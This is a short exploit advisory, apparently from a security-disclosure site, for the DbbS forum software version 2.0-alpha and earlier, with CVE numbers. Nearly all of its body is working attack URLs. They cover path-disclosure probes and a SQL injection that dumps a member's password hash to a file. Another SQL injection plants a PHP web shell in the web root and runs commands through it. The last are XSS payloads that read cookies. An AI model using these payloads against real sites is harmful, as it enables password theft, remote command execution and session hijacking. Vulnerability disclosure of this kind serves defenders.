DbbS<=2.0-alpha Multiple Vulnerabilities

2006.04.24
Credit: yamcho mail it
Risk: Low
Local: Yes
Remote: Yes
CVE: CVE-2006-1916 | CVE-2006-1915 | CVE-2006-1914
CWE: N/A

Special thanks to rgod for his help!!! Full path disclosure http://www.site.com/DbbS/topics.php?fcategoryid=' http://www.site.com/DbbS/script.php?unavariabile[]= http://www.site.com/DbbS/script.php?GLOBALS[]= http://www.site.com/DbbS/script.php?_SERVER[]= MD5 Password http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2 0null,pass%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\test.txt'%20FRO M%20forum_membres%20WHERE%20id='1'/* Create shell http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2 0null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\inetpub\w wwroot\dbbs\suntzu.php'%20FROM%20forum_categories/* Launch a command http://www.site.com/DbbS/suntzu.php?cmd=dir XSS http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><scrip t>alert(document.cookie)</script> http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script >alert(document.cookie)</script> by rgod and yamcho


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top